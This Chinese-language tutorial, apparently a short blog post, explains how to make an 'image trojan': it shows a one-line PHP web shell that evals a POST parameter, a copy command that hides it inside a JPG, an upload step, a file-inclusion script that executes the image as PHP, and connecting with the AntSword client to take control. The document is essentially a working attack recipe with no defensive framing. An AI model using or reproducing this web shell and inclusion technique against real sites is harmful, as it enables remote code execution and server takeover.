一句话图片木马

一句话图片木马

一、准备图片木马
1、准备任意图片pho.jpg
2、准备木马文件hack.php

<?php @eval($_POST['hack']);?>

3、利用系统命令，将木马复制到图片文件中，产生图片木马hack.jpg

copy pho.jpg/b+hack.php/a hack.jpg

b二进制格式，a为ASCII

二、上传图片

三、利用文件包含漏洞解析图片木马（没有文件包含漏洞图片木马将无法执行）
1、
右键图片复制图片地址，找到图片木马具体位置（upload//4820200820225424.jpg）
2、访问include.php

<?php
$file = $_GET['file'];
include $file;
?>

可以看到，include.php引用参数file文件，并且都当成php文件执行，file=木马图片位置，这样图片内的php木马代码就可以得以解析

四、蚁剑连接
url地址指向文件包含漏洞的地址

右键文件管理拿到webshell